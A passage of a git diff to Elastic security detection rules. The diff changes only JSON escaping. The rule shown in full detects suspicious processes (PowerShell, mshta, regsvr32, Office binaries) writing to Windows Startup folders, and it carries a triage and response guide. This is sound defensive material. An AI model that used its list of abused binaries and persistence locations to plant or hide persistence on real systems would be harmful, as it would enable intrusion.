'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Administrators may add programs to this mechanism via command-line shells. Before the further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n user.domain != \"NT AUTHORITY\" and\n file.path : (\"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\*\",\n \"C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\StartUp\\\\*\") and\n process.name : (\"cmd.exe\",\n \"powershell.exe\",\n \"wmic.exe\",\n \"mshta.exe\",\n \"pwsh.exe\",\n \"cscript.exe\",\n \"wscript.exe\",\n \"regsvr32.exe\",\n \"RegAsm.exe\",\n \"rundll32.exe\",\n \"EQNEDT32.EXE\",\n \"WINWORD.EXE\",\n \"EXCEL.EXE\",\n \"POWERPNT.EXE\",\n \"MSPUB.EXE\",\n \"MSACCESS.EXE\",\n \"iexplore.exe\",\n \"InstallUtil.exe\")\n", "references": [ "https://www.elastic.co/security-labs/hunting-for-persistence-using-elastic-security-part-1" @@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "440e2db4-bc7f-4c96-a068-65b78da59bde", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/440e2db4-bc7f-4c96-a068-65b78da59bde_108.json b/packages/security_detection_engine/kibana/security_rule/440e2db4-bc7f-4c96-a068-65b78da59bde_108.json index 572285bbc08..b223d3303ab 100644 --- a/packages/security_detection_engine/kibana/security_rule/440e2db4-bc7f-4c96-a068-65b78da59bde_108.json +++ b/packages/security_detection_engine/kibana/security_rule/440e2db4-bc7f-4c96-a068-65b78da59bde_108.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Startup Persistence by a Suspicious Process", - "note": "## Triage and analysis\n\n### Investigating Startup Persistence by a Suspicious Process\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule monitors for commonly abused processes writing to the Startup folder locations.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Administrators may add programs to this mechanism via command-line shells. Before the further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating Startup Persistence by a Suspicious Process\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule monitors for commonly abused processes writing to the Startup folder locations.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Administrators may add programs to this mechanism via command-line shells. Before the further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n user.domain != \"NT AUTHORITY\" and\n file.path : (\"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\*\",\n \"C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\StartUp\\\\*\") and\n process.name : (\"cmd.exe\",\n \"powershell.exe\",\n \"wmic.exe\",\n \"mshta.exe\",\n \"pwsh.exe\",\n \"cscript.exe\",\n \"wscript.exe\",\n \"regsvr32.exe\",\n \"RegAsm.exe\",\n \"rundll32.exe\",\n \"EQNEDT32.EXE\",\n \"WINWORD.EXE\",\n \"EXCEL.EXE\",\n \"POWERPNT.EXE\",\n \"MSPUB.EXE\",\n \"MSACCESS.EXE\",\n \"iexplore.exe\",\n \"InstallUtil.exe\")\n", "references": [ "https://www.elastic.co/security-labs/hunting-for-persistence-using-elastic-security-part-1" @@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "440e2db4-bc7f-4c96-a068-65b78da59bde", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/445a342e-03fb-42d0-8656-0367eb2dead5_102.json b/packages/security_detection_engine/kibana/security_rule/445a342e-03fb-42d0-8656-0367eb2dead5_102.json index afc03acd6aa..3d731e89b05 100644 --- a/packages/security_detection_engine/kibana/security_rule/445a342e-03fb-42d0-8656-0367eb2dead5_102.json +++ b/packages/security_detection_engine/kibana/security_rule/445a342e-03fb-42d0-8656-0367eb2dead5_102.json @@ -33,7 +33,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -55,7 +55,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/445a342e-03fb-42d0-8656-0367eb2dead5_103.json b/packages/security_detection_engine/kibana/security_rule/445a342e-03fb-42d0-8656-0367eb2dead5_103.json index 3e4b94f7939..8100c09eda1 100644 --- a/packages/security_detection_engine/kibana/security_rule/445a342e-03fb-42d0-8656-0367eb2dead5_103.json +++ b/packages/security_detection_engine/kibana/security_rule/445a342e-03fb-42d0-8656-0367eb2dead5_103.json @@ -32,7 +32,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -54,7 +54,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/445a342e-03fb-42d0-8656-0367eb2dead5_104.json b/packages/security_detection_engine/kibana/security_rule/445a342e-03fb-42d0-8656-0367eb2dead5_104.json index 41a4c7e25aa..993416f5436 100644 --- a/packages/security_detection_engine/kibana/security_rule/445a342e-03fb-42d0-8656-0367eb2dead5_104.json +++ b/packages/security_detection_engine/kibana/security_rule/445a342e-03fb-42d0-8656-0367eb2dead5_104.json @@ -42,7 +42,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -64,7 +64,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/4494c14f-5ff8-4ed2-8e99-bf816a1642fc_1.json b/packages/security_detection_engine/kibana/security_rule/4494c14f-5ff8-4ed2-8e99-bf816a1642fc_1.json index 6bde717c195..0a79dc2645e 100644 --- a/packages/security_detection_engine/kibana/security_rule/4494c14f-5ff8-4ed2-8e99-bf816a1642fc_1.json +++ b/packages/security_detection_engine/kibana/security_rule/4494c14f-5ff8-4ed2-8e99-bf816a1642fc_1.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/4494c14f-5ff8-4ed2-8e99-bf816a1642fc_2.json b/packages/security_detection_engine/kibana/security_rule/4494c14f-5ff8-4ed2-8e99-bf816a1642fc_2.json index 05716d200d1..e6afa1e1ced 100644 --- a/packages/security_detection_engine/kibana/security_rule/4494c14f-5ff8-4ed2-8e99-bf816a1642fc_2.json +++ b/packages/security_detection_engine/kibana/security_rule/4494c14f-5ff8-4ed2-8e99-bf816a1642fc_2.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -87,7 +87,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/44fc462c-1159-4fa8-b1b7-9b6296ab4f96_5.json b/packages/security_detection_engine/kibana/security_rule/44fc462c-1159-4fa8-b1b7-9b6296ab4f96_5.json index 372176cf8e8..498e0d3b628 100644 --- a/packages/security_detection_engine/kibana/security_rule/44fc462c-1159-4fa8-b1b7-9b6296ab4f96_5.json +++ b/packages/security_detection_engine/kibana/security_rule/44fc462c-1159-4fa8-b1b7-9b6296ab4f96_5.json @@ -68,7 +68,7 @@ ], "risk_score": 47, "rule_id": "44fc462c-1159-4fa8-b1b7-9b6296ab4f96", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/44fc462c-1159-4fa8-b1b7-9b6296ab4f96_6.json b/packages/security_detection_engine/kibana/security_rule/44fc462c-1159-4fa8-b1b7-9b6296ab4f96_6.json index 80cec9111c9..3f16e59568a 100644 --- a/packages/security_detection_engine/kibana/security_rule/44fc462c-1159-4fa8-b1b7-9b6296ab4f96_6.json +++ b/packages/security_detection_engine/kibana/security_rule/44fc462c-1159-4fa8-b1b7-9b6296ab4f96_6.json @@ -63,7 +63,7 @@ ], "risk_score": 47, "rule_id": "44fc462c-1159-4fa8-b1b7-9b6296ab4f96", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/44fc462c-1159-4fa8-b1b7-9b6296ab4f96_7.json b/packages/security_detection_engine/kibana/security_rule/44fc462c-1159-4fa8-b1b7-9b6296ab4f96_7.json index ff00a48d9f0..2f612ce958f 100644 --- a/packages/security_detection_engine/kibana/security_rule/44fc462c-1159-4fa8-b1b7-9b6296ab4f96_7.json +++ b/packages/security_detection_engine/kibana/security_rule/44fc462c-1159-4fa8-b1b7-9b6296ab4f96_7.json @@ -63,7 +63,7 @@ ], "risk_score": 47, "rule_id": "44fc462c-1159-4fa8-b1b7-9b6296ab4f96", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/44fc462c-1159-4fa8-b1b7-9b6296ab4f96_8.json b/packages/security_detection_engine/kibana/security_rule/44fc462c-1159-4fa8-b1b7-9b6296ab4f96_8.json index 05b3b70d02c..36e810af3b8 100644 --- a/packages/security_detection_engine/kibana/security_rule/44fc462c-1159-4fa8-b1b7-9b6296ab4f96_8.json +++ b/packages/security_detection_engine/kibana/security_rule/44fc462c-1159-4fa8-b1b7-9b6296ab4f96_8.json @@ -63,7 +63,7 @@ ], "risk_score": 47, "rule_id": "44fc462c-1159-4fa8-b1b7-9b6296ab4f96", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/44fc462c-1159-4fa8-b1b7-9b6296ab4f96_9.json b/packages/security_detection_engine/kibana/security_rule/44fc462c-1159-4fa8-b1b7-9b6296ab4f96_9.json index 77a2960df3e..99fa930e62e 100644 --- a/packages/security_detection_engine/kibana/security_rule/44fc462c-1159-4fa8-b1b7-9b6296ab4f96_9.json +++ b/packages/security_detection_engine/kibana/security_rule/44fc462c-1159-4fa8-b1b7-9b6296ab4f96_9.json @@ -62,7 +62,7 @@ ], "risk_score": 47, "rule_id": "44fc462c-1159-4fa8-b1b7-9b6296ab4f96", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/453f659e-0429-40b1-bfdb-b6957286e04b_100.json b/packages/security_detection_engine/kibana/security_rule/453f659e-0429-40b1-bfdb-b6957286e04b_100.json index 6c9bc561585..3da83e91f54 100644 --- a/packages/security_detection_engine/kibana/security_rule/453f659e-0429-40b1-bfdb-b6957286e04b_100.json +++ b/packages/security_detection_engine/kibana/security_rule/453f659e-0429-40b1-bfdb-b6957286e04b_100.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/453f659e-0429-40b1-bfdb-b6957286e04b_101.json b/packages/security_detection_engine/kibana/security_rule/453f659e-0429-40b1-bfdb-b6957286e04b_101.json index b664b55181e..64fc096bfac 100644 --- a/packages/security_detection_engine/kibana/security_rule/453f659e-0429-40b1-bfdb-b6957286e04b_101.json +++ b/packages/security_detection_engine/kibana/security_rule/453f659e-0429-40b1-bfdb-b6957286e04b_101.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/45ac4800-840f-414c-b221-53dd36a5aaf7_105.json b/packages/security_detection_engine/kibana/security_rule/45ac4800-840f-414c-b221-53dd36a5aaf7_105.json index e6bcaab7c3f..fe265677506 100644 --- a/packages/security_detection_engine/kibana/security_rule/45ac4800-840f-414c-b221-53dd36a5aaf7_105.json +++ b/packages/security_detection_engine/kibana/security_rule/45ac4800-840f-414c-b221-53dd36a5aaf7_105.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/45ac4800-840f-414c-b221-53dd36a5aaf7_106.json b/packages/security_detection_engine/kibana/security_rule/45ac4800-840f-414c-b221-53dd36a5aaf7_106.json index 3d3a6655625..db2c476e6cb 100644 --- a/packages/security_detection_engine/kibana/security_rule/45ac4800-840f-414c-b221-53dd36a5aaf7_106.json +++ b/packages/security_detection_engine/kibana/security_rule/45ac4800-840f-414c-b221-53dd36a5aaf7_106.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/45ac4800-840f-414c-b221-53dd36a5aaf7_107.json b/packages/security_detection_engine/kibana/security_rule/45ac4800-840f-414c-b221-53dd36a5aaf7_107.json index 7daf2902ec2..2b6567d00f1 100644 --- a/packages/security_detection_engine/kibana/security_rule/45ac4800-840f-414c-b221-53dd36a5aaf7_107.json +++ b/packages/security_detection_engine/kibana/security_rule/45ac4800-840f-414c-b221-53dd36a5aaf7_107.json @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/45d273fb-1dca-457d-9855-bcb302180c21_105.json b/packages/security_detection_engine/kibana/security_rule/45d273fb-1dca-457d-9855-bcb302180c21_105.json index 91e47ff753c..da8fa789462 100644 --- a/packages/security_detection_engine/kibana/security_rule/45d273fb-1dca-457d-9855-bcb302180c21_105.json +++ b/packages/security_detection_engine/kibana/security_rule/45d273fb-1dca-457d-9855-bcb302180c21_105.json @@ -63,7 +63,7 @@ ], "risk_score": 47, "rule_id": "45d273fb-1dca-457d-9855-bcb302180c21", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/45d273fb-1dca-457d-9855-bcb302180c21_106.json b/packages/security_detection_engine/kibana/security_rule/45d273fb-1dca-457d-9855-bcb302180c21_106.json index 84fb91bb4ce..d1480b081d6 100644 --- a/packages/security_detection_engine/kibana/security_rule/45d273fb-1dca-457d-9855-bcb302180c21_106.json +++ b/packages/security_detection_engine/kibana/security_rule/45d273fb-1dca-457d-9855-bcb302180c21_106.json @@ -63,7 +63,7 @@ ], "risk_score": 47, "rule_id": "45d273fb-1dca-457d-9855-bcb302180c21", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/45d273fb-1dca-457d-9855-bcb302180c21_107.json b/packages/security_detection_engine/kibana/security_rule/45d273fb-1dca-457d-9855-bcb302180c21_107.json index 